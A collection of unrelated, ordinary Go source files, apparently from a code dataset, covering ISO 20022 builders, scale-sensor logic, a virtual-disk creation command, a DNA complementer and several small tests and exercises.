n.ClearingMember = new(iso20022.PartyIdentification35Choice)
return n.ClearingMember
}
func (n *NetPositionV03) AddClearingSegment() *iso20022.PartyIdentification35Choice {
n.ClearingSegment = new(iso20022.PartyIdentification35Choice)
return n.ClearingSegment
}
func (n *NetPositionV03) AddNetPositionReport() *iso20022.NetPosition3 {
newValue := new(iso20022.NetPosition3)
n.NetPositionReport = append(n.NetPositionReport, newValue)
return newValue
}
func (n *NetPositionV03) AddSupplementaryData() *iso20022.SupplementaryData1 {
newValue := new(iso20022.SupplementaryData1)
n.SupplementaryData = append(n.SupplementaryData, newValue)
return newValue
}
|
package main
//构造函数
import "fmt"
type person struct {
name string
gender string
age int
}
//构造函数:约定俗成用new开头
//返回的是结构体还是结构体指针是要根据实际情况考虑,字段较少可以返回值,
//字段较多返回指针,减少程序运行的内存开销
// func newPerson(name string, gender string, age int) person { //返回值
// return person{
// name: name,
// gender: gender,
// age: age,
// }
// }
func newPerson(name string, gender string, age int) *person { //返回指针
return &person{
name: name,
gender: gender,
age: age,
}
}
func main() {
s1 := newPerson("xiaohong", "male", 8)
fmt.Printf("%#v\n", s1)
}
|
package ascii2svg // import "moul.io/ascii2svg/ascii2svg"
|
/*
Write a function redundant that takes in a string str and returns
a function that returns str.
Notes
Your function should return a function, not a string.
*/
package main
import "fmt"
func main() {
f1 := redundant("apple")
f2 := redundant("pear")
f3 := redundant("")
fmt.Println(f1())
fmt.Println(f2())
fmt.Println(f3())
}
func redundant(s string) func() string {
return func() string {
return s
}
}
|
package byscaler
import (
"bylib/bylog"
"bylib/byutils"
"sync"
)
const (
MAX_STILL_COUNT=3
)
//传感器集合/称,一般对应一个称连接n个传感器
type SensorSet struct{
Addr int32 `json:"addr"`//集散器ID
Online bool `json:"-"`
TimeStamp int64 `json:"-"`//上次的时间戳
Timeout int32 `json:"-"`//超时计数器.
Diffs map[int]int32 `json:"diffs"` //零点集合.
Zeros map[int]int32 `json:"zeros"`//零点集合.
Sensors map[int]*Sensor //传感器地址和传感器信息的map
Lock sync.Mutex `json:"-"`
}
func (ss *SensorSet)SensorNum()int{
return len(ss.Sensors)
}
func (ss *SensorSet)Zero(addr int)int32{
if z,ok:=ss.Zeros[addr];ok{
return z
}
return 0
}
func (ss *SensorSet)SetDiff(addr int,value int32){
ss.Diffs[addr] = value
}
func (ss *SensorSet)SetZero(addr int,value int32){
ss.Zeros[addr] = value
}
func (ss *SensorSet)SetValue(addr int,value int32){
ss.Lock.Lock()
defer ss.Lock.Unlock()
ss.Sensors[addr].CalcValue = value
}
func (ss *SensorSet)SetAllZero(value int32){
ss.Lock.Lock()
defer ss.Lock.Unlock()
for _,s:=range ss.Sensors{
s.CalcValue = value
}
}
func (ss *SensorSet)UpdateDiff(value int32){
ss.Lock.Lock()
defer ss.Lock.Unlock()
for addr,_:=range ss.Sensors{
ss.Diffs[addr]=value
}
}
//清零,记录传感器的当前值到zero点列表.
func (ss *SensorSet)Clear(){
ss.Lock.Lock()
defer ss.Lock.Unlock()
for addr,s:=range ss.Sensors{
ss.Zeros[addr]=s.Value
}
}
func (ss *SensorSet)GetErrSensor()(sensors []*Sensor){
for _,s:=range ss.Sensors{
if s.State.Error{
sensors=append(sensors,&Sensor{
Addr:s.Addr,
Value:s.Value,
CalcValue:s.CalcValue,
StateValue:s.StateValue,
State:s.State,
})
}
}
return
}
func (ss *SensorSet)Update(){
ss.Lock.Lock()
defer ss.Lock.Unlock()
for _,s:=range ss.Sensors{
s.CalcValue = s.Value
if z,ok:=ss.Zeros[int(s.Addr)];ok{
s.CalcValue = s.Value-z
}
}
}
func (ss *SensorSet)GetValues()[]uint16{
sn:=ss.SensorNum()
var values []uint16
//传感器的个数,从1开始
for i:=1; i <= sn; i++{
values=append(values,uint16(ss.Sensors[i].Value))
}
return values
}
func (sset *SensorSet)CopySensorSet(sset2 *SensorSet){
sset.Lock.Lock()
defer sset.Lock.Unlock()
for addr,s:=range sset2.Sensors{
if s==nil{
bylog.Debug("s==nil")
continue
}
if _,ok:=sset.Sensors[addr];ok{
bylog.Debug("copy id=%d addr=%d value=%d",sset.Addr,addr,s.CalcValue)
sset.Sensors[addr].CalcValue = s.CalcValue
}
}
}
//拷贝数据
func (sset *SensorSet)CopySensors()(sr []*Sensor){
sset.Lock.Lock()
defer sset.Lock.Unlock()
for _,s:=range sset.Sensors{
sr=append(sr,&Sensor{
Addr:s.Addr,
Value:s.Value,
CalcValue:s.CalcValue,
StateValue:s.StateValue,
State:s.State,
})
//if addr == 1{
// bylog.Debug("calc=%d",s.CalcValue)
//}
}
return
}
//比较两组传感器值,如果超过范围
func (sset *SensorSet)Compare(old *SensorSet,diff int32,still uint8)(sg []*Sensor){
sset.Lock.Lock()
defer sset.Lock.Unlock()
//直接遍历当前数据
for addr,s:=range sset.Sensors{
//当前重量不稳定,或者错误 不进行重量判断.
//if sset.Addr==1 && addr==2{
// bylog.Debug("w=%d state=%x still=%d",s.Value,s.StateValue,s.StillCount)
//}
//if !s.State.Still || s.State.Error {
if _,ok:=sset.Diffs[addr];!ok{
//如果没有自己的差异值,就用全局的.
sset.Diffs[addr]= int32(diff)
}
if s.State.Error {
s.StillCount=0
continue
}
//稳定次数大于某个数
if s.StillCount < still{
s.StillCount++
continue
}
s.StillCount=0
//判断上次记录中是否有该地址.
if _,ok:=old.Sensors[addr];!ok{
//没有数据,并且重量稳定,仅仅更新值.
old.Sensors[addr] = NewSensor(int32(addr))
old.Sensors[addr].Value = s.Value
old.Sensors[addr].CalcValue = s.CalcValue
old.Sensors[addr].Addr = s.Addr
old.Sensors[addr].State = s.State
old.Sensors[addr].TimeStamp = s.TimeStamp
old.Sensors[addr].Timeout = s.Timeout
old.Sensors[addr].StateValue = s.StateValue
continue
}
df:=byutil.Abs(int(s.CalcValue),int(old.Sensors[addr].CalcValue))
//bylog.Debug("addr=%d new=%d old=%d diff=%d %d",addr,s.CalcValue,old.Sensors[addr].CalcValue,df,diff)
if sdiff,ok:=sset.Diffs[addr];ok{
//如果有传感器自己的sdiff,就用传感器自己的sdiff.
diff = sdiff
}else{
//否则设置成默认的.
sset.Diffs[addr]= int32(diff)
}
if df > int(diff){
if addr == 2{
bylog.Debug("df=%d diff=%d",df,diff)
}
sg=append(sg,&Sensor{
Addr: int32(addr),
CalcValue:s.CalcValue - old.Sensors[addr].CalcValue,
State:s.State,
StateValue:s.StateValue,
TimeStamp:s.TimeStamp,
Timeout:s.Timeout,
})
//重量阀值超过旧的值,才更新旧的值
old.Sensors[addr].Value = s.Value
old.Sensors[addr].CalcValue = s.CalcValue
old.Sensors[addr].Addr = s.Addr
old.Sensors[addr].State = s.State
old.Sensors[addr].StateValue = s.StateValue
old.Sensors[addr].TimeStamp = s.TimeStamp
old.Sensors[addr].Timeout = s.Timeout
}else{
//否则如果小于阀值,但是
}
}
return
}
func NewSensorSet(addr int32 )*SensorSet {
ss:=&SensorSet{
Addr:addr,
Sensors:make(map[int]*Sensor),
Zeros:make(map[int]int32),
Diffs:make(map[int]int32),
}
return ss
} |
package treenode
var (
ExampleTree1 = &Node{
Val: 1,
Children: []*Node{
{
Val: 3,
Children: []*Node{
{Val: 5},
{Val: 6},
},
},
{Val: 2},
{Val: 4},
},
}
ExampleTree2 = &Node{
Val: 1,
Children: []*Node{
{Val: 2},
{
Val: 3,
Children: []*Node{
{Val: 6},
{Val: 7, Children: []*Node{
{Val: 11, Children: []*Node{
{Val: 14},
}},
}},
},
},
{Val: 4, Children: []*Node{
{Val: 8, Children: []*Node{
{Val: 12},
}},
}},
{Val: 5, Children: []*Node{
{Val: 9, Children: []*Node{
{Val: 13},
}},
{Val: 10},
}},
},
}
) |
package info
import (
"bytes"
"testing"
"github.com/trevershick/analytics2-cli/a2m/test"
"github.com/trevershick/analytics2-cli/a2m/config"
)
func Test_showHalted(t *testing.T) {
cfg := config.Configuration{}
cfg.BaseUrl = "http://localhost:1000/xxx"
response := `
[{"workspaceOid":41529001,"subscriptionId":100,"data":{"reason":"manually halted"},"healthCheckShouldFail":false,"timestamp":"2015-02-14T15:32:28Z"}]
`
myLoader, passedInRestArgs := test.FakeRestLoader(response)
var myWriter bytes.Buffer
args := &showHaltedArgs{
config: &cfg,
loader: myLoader,
writer: &myWriter,
}
showHalted(args)
test.AssertEquals(t, "http://localhost:1000/xxx/info/haltedWorkspaces", passedInRestArgs.Url)
output := myWriter.String()
test.AssertContains(t, "Halted Workspaces", output)
test.AssertContains(t, "41529001", output)
test.AssertContains(t, "100", output)
test.AssertContains(t, "manually halted", output)
test.AssertContains(t, "false", output)
test.AssertContains(t, "2015-02-14T15:32:28Z", output)
}
|
//-----------------------------------------------Paquetes E Imports-----------------------------------------------------
package AnalisisYComandos
import (
"../Metodos"
"../Variables"
"bytes"
"encoding/binary"
"fmt"
"github.com/gookit/color"
"math/rand"
"os"
"strconv"
"strings"
"time"
"unsafe"
)
//--------------------------------------------------------Métodos-------------------------------------------------------
func VerificarComandoMkdisk() {
//Variables
var Size bool
var Path bool
var Name bool
var Unit bool
var ParametroExtra bool
var ArregloParametros []string
var ContadorSize int
var ContadorPath int
var ContadorName int
var ContadorUnit int
var AvisoError error
//Asignación
Size = false
Path = false
Name = false
Unit = true
ParametroExtra = false
ContadorSize = 0
ContadorPath = 0
ContadorName = 0
ContadorUnit = 0
Variables.MapComandos = make(map[string]string)
Variables.MapComandos["unit"] = "1048576"
Variables.CreeDirectorio = false
//Verificación De Parametros
if len(Variables.ArregloComandos) > 1 {
for Contador := 1; Contador <= len(Variables.ArregloComandos) - 1; Contador++ {
//Obtener Parametro
Variables.ArregloComandos[Contador] = Metodos.Trim(Variables.ArregloComandos[Contador])
ArregloParametros = Metodos.SplitParametro(Variables.ArregloComandos[Contador])
ArregloParametros[0] = strings.ToLower(ArregloParametros[0])
ArregloParametros[0] = Metodos.Trim(ArregloParametros[0])
switch ArregloParametros[0] {
case "size":
if ContadorSize == 0 {
if len(ArregloParametros) > 1 {
ArregloParametros[1] = Metodos.Trim(ArregloParametros[1])
var Tamanio int
var ErrorEntero error
Tamanio, ErrorEntero = strconv.Atoi(ArregloParametros[1])
if ErrorEntero != nil {
color.HEX("#de4843", false).Println("El Parametro Size Debe Ser Un Número")
fmt.Println("")
} else {
if Tamanio > 0 {
Variables.MapComandos["size"] = ArregloParametros[1]
Size = true
} else {
Size = false
color.HEX("#de4843", false).Println("El Parametro Size Debe Ser Un Número Mayor A 0")
fmt.Println("")
}
ContadorSize++
}
} else {
Size = false
}
} else {
ContadorSize++
}
case "path":
if ContadorPath == 0 {
if len(ArregloParametros) > 1 {
ArregloParametros[1] = Metodos.QuitarComillas(ArregloParametros[1])
ArregloParametros[1] = Metodos.Trim(ArregloParametros[1])
Path = Metodos.VerificarYCrearRutas(ArregloParametros[1])
if Path {
Variables.MapComandos["path"] = ArregloParametros[1]
}
ContadorPath++
} else {
Path = false
}
} else {
ContadorPath++
}
case "name":
if ContadorName == 0 {
if len(ArregloParametros) > 1 {
ArregloParametros[1] = Metodos.QuitarComillas(ArregloParametros[1])
ArregloParametros[1] = Metodos.Trim(ArregloParametros[1])
Name = Metodos.ContineCaractereProhibidos(ArregloParametros[1])
if Name {
Name = Metodos.VerificarExtension(ArregloParametros[1])
if Name {
Variables.MapComandos["name"] = ArregloParametros[1]
} else {
color.HEX("#de4843", false).Println("En El Parametro Name La Extension Del Archivo No Es la Indicada Debe De Ser .dsk")
fmt.Println("")
}
} else {
color.HEX("#de4843", false).Println("En El Parametor Name El Nombre Del Disco Contiene Carcteres Prohibidos")
fmt.Println("")
}
ContadorName++
} else {
Name = false
}
} else {
ContadorName++
}
case "unit":
if ContadorUnit == 0 {
if len(ArregloParametros) > 1 {
ArregloParametros[1] = strings.ToLower(Metodos.Trim(ArregloParametros[1]))
if ArregloParametros[1] == "k" {
Variables.MapComandos["unit"] = "1024"
Unit = true
} else if ArregloParametros[1] == "m" {
Variables.MapComandos["unit"] = "1048576"
Unit = true
} else {
color.HEX("#de4843", false).Println("En El Parametro Unit Debe De Ingresar La Letra m (Megabytes) O La Letra k (Kylobytes)")
fmt.Println("")
Unit = false
}
ContadorUnit++
} else {
Unit = false
}
} else {
ContadorUnit++
}
default:
ParametroExtra = true
}
}
}
if Path && Size && Name && Unit && !ParametroExtra && ContadorPath == 1 && ContadorSize == 1 && ContadorName == 1 && (ContadorUnit == 1 || ContadorUnit == 0) {
ObtenerRutaArchivo()
} else {
if ParametroExtra {
color.HEX("#de4843", false).Println("Parametro Especificado No Valido")
color.HEX("#de4843", false).Println("Parametros Validos: ")
color.HEX("#de4843", false).Println("1). -path-> (Obligatorio)")
color.HEX("#de4843", false).Println( "2). -size-> (Obligatorio)")
color.HEX("#de4843", false).Println( "3). -name-> (Obligatorio)")
color.HEX("#de4843", false).Println( "4). -unit-> (Opcional)")
fmt.Println("")
}
if !Path {
color.HEX("#de4843", false).Println("No Se Encuentra El Parametro -path-> o")
color.HEX("#de4843", false).Println("Error Al Crear El Directorio")
fmt.Println("")
}
if !Size {
color.HEX("#de4843", false).Println("No Se Encuentra El Parametro -size-> o")
color.HEX("#de4843", false).Println("Existe Error En La Sintaxis")
fmt.Println("")
}
if !Name {
color.HEX("#de4843", false).Println("No Se Encuentra el Parametro -name-> o")
color.HEX("#de4843", false).Println("Existe Error En La Sintaxis")
fmt.Println("")
}
if !Unit {
color.HEX("#de4843", false).Println("Existe Error En La Sintaxis En El Paremtro -unit->")
fmt.Println("")
}
if ContadorSize > 1 || ContadorPath > 1 || ContadorName > 1 || ContadorUnit > 1{
color.HEX("#de4843", false).Println("Existen Demasiados Parametros")
fmt.Println("")
}
if Variables.CreeDirectorio {
AvisoError = os.Remove(Metodos.Trim(Variables.MapComandos["path"]))
_ = AvisoError
}
}
}
func ObtenerRutaArchivo() {
//Variables
var ExisteBarra bool
var RutaArchivo string
//Verificar Sistema Operativo
if Variables.SistemaOperativo == "windows" {
ExisteBarra = strings.HasSuffix(Metodos.Trim(Variables.MapComandos["path"]), "\\")
if ExisteBarra {
RutaArchivo = Metodos.Trim(Variables.MapComandos["path"]) + Metodos.Trim(Variables.MapComandos["name"])
} else {
RutaArchivo = Metodos.Trim(Variables.MapComandos["path"]) + "\\" + Metodos.Trim(Variables.MapComandos["name"])
}
VerificarSiExisteDisco(RutaArchivo)
} else if Variables.SistemaOperativo == "linux" {
ExisteBarra = strings.HasSuffix(Metodos.Trim(Variables.MapComandos["path"]), "/")
if ExisteBarra {
RutaArchivo = Metodos.Trim(Variables.MapComandos["path"]) + Metodos.Trim(Variables.MapComandos["name"])
} else {
RutaArchivo = Metodos.Trim(Variables.MapComandos["path"]) + "/" + Metodos.Trim(Variables.MapComandos["name"])
}
VerificarSiExisteDisco(RutaArchivo)
} else {
color.HEX("#de4843", false).Println("Sistema Operativo No Soportado")
fmt.Println("")
}
}
func VerificarSiExisteDisco(RutaArchivo string) {
//Variables
var Bandera bool
//Asignación
Bandera = false
//Verificar Si No Existe El Disco
Bandera = Metodos.ExisteArchivo(Metodos.Trim(RutaArchivo))
if !Bandera {
ComandoMkdisk(RutaArchivo)
} else {
color.HEX("#de4843", false).Println("Ya Existe Un Disco Con El Mismo Nombre En La Ruta Indicada")
fmt.Println("")
}
}
func ComandoMkdisk(RutaArchivo string) {
//Variables
var Archivo *os.File
var AvisoError error
var CeroBinario int8
var CeroByte *int8
var CadenaBinaria bytes.Buffer
var CadenaBinariaFinal bytes.Buffer
var CadenaBinariaMBR bytes.Buffer
var Posicion int64
var Unit int
var Size int
var Fecha time.Time
var MBRAuxiliar = Variables.MBREstructura{}
//Creando Archivo
Archivo, AvisoError = os.Create(RutaArchivo)
//Catch Error
if AvisoError != nil {
color.HEX("#de4843", false).Println("Error al Generar Al Archivo")
fmt.Println("")
} else {
//Asignación
CeroBinario = 0
CeroByte = &CeroBinario
//Escribir Archivo
_ = binary.Write(&CadenaBinaria, binary.BigEndian, CeroByte)
Metodos.EscribirArchivoBinario(Archivo, CadenaBinaria.Bytes())
//Posicion Final
Unit, _ = strconv.Atoi(Metodos.Trim(Variables.MapComandos["unit"]))
Size, _ = strconv.Atoi(Metodos.Trim(Variables.MapComandos["size"]))
Posicion = int64((Unit * Size) - 1)
//Mover A Posicion Final
_, _ = Archivo.Seek(Posicion, 0)
//Escribir Al Final Del Archivo
_ = binary.Write(&CadenaBinariaFinal, binary.BigEndian, CeroByte)
Metodos.EscribirArchivoBinario(Archivo, CadenaBinariaFinal.Bytes())
//Escribir MBR
//Posicionar Al Inicio Para Escribir El MBR
_, _ = Archivo.Seek(0, 0)
//Rellenar Esctructura
MBRAuxiliar = Variables.MBREstructura{}
//Tamaño Total Del Disco TamañoTotal - Tamaño MBR
MBRAuxiliar.SizeMbr = Posicion + 1 - int64(unsafe.Sizeof(Variables.MBREstructura{}))
//Fecha Actual
Fecha = time.Now()
copy(MBRAuxiliar.FCreacionMBR[:], Fecha.String())
//Identificador Unico Disco
MBRAuxiliar.IDMBR = int64(rand.Intn(100000000))
//Particiones
MBRAuxiliar.Particion1MBR = Variables.ParticionEstructura{}
MBRAuxiliar.Particion2MBR = Variables.ParticionEstructura{}
MBRAuxiliar.Particion3MBR = Variables.ParticionEstructura{}
MBRAuxiliar.Particion4MBR = Variables.ParticionEstructura{}
//Asignación
MBRDireccion := &MBRAuxiliar
//Escribir Archivo
_ = binary.Write(&CadenaBinariaMBR, binary.BigEndian, MBRDireccion)
Metodos.EscribirArchivoBinario(Archivo, CadenaBinariaMBR.Bytes())
color.Success.Println("Disco Creado Con Exito!")
fmt.Println("")
_ = Archivo.Close()
}
} |
package glow
var baseConv = [256]byte{
'A': 'T',
'T': 'A',
'C': 'G',
'G': 'C',
'N': 'N',
'\n': '\n',
}
type BaseComplementer struct {
In chan []byte
Out chan []byte
}
func (self *BaseComplementer) OutChan() chan []byte {
self.Out = make(chan []byte, 16)
return self.Out
}
func (self *BaseComplementer) Init() {
go func() {
for line := range self.In {
if line[0] != '>' {
for pos := range line {
line[pos] = baseConv[line[pos]]
}
}
self.Out <- append([]byte(nil), line...)
}
close(self.Out)
}()
}
|
package main
import (
"log"
"github.com/sanjay/roam/pkg/server"
)
// Constant to define the port number
const (
Port = ":3000"
)
func main() {
s, err := server.InitializeServer()
if err != nil {
log.Println("Cannnot start server error: ", err)
}
s.Run(Port)
}
|
package main
import (
"fmt"
"io"
"os"
"os/exec"
"syscall"
"testing"
"time"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
)
func TestStopSlirp(t *testing.T) {
for _, c := range [][]string{
// Should terminate process gracefully
{"/bin/sleep", "60"},
// Should kill process after termination timeout
{"/bin/sh", "-c", "sig() { echo signal received but refusing to terminate; sleep 60; }; trap sig 2 3 15; sleep 60 & wait"},
} {
fmt.Printf("Process: %+v\n", c)
cmd := exec.Command(c[0], c[1:]...)
cmd.SysProcAttr = &syscall.SysProcAttr{Setpgid: true}
stdout, err := cmd.StdoutPipe()
require.NoError(t, err)
stderr, err := cmd.StderrPipe()
require.NoError(t, err)
go func() {
io.Copy(os.Stdout, stdout)
}()
go func() {
io.Copy(os.Stderr, stderr)
}()
err = cmd.Start()
require.NoError(t, err)
pid := cmd.Process.Pid
defer syscall.Kill(pid, syscall.SIGKILL)
go func() {
cmd.Wait()
}()
time.Sleep(time.Duration(300 * time.Millisecond))
startTime := time.Now()
stopCh := make(chan error)
go func() {
stopCh <- stopSlirp(pid)
}()
select {
case err = <-stopCh:
require.NoError(t, err, "stopSlirp()")
fmt.Println("stopSlirp() returned after", time.Since(startTime).String())
err = syscall.Kill(pid, syscall.Signal(0))
assert.True(t, err == syscall.ESRCH, "process has not been terminated")
case <-time.After(time.Duration(7 * time.Second)):
t.Errorf("timed out waiting for stopSlirp() to return")
t.FailNow()
}
}
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.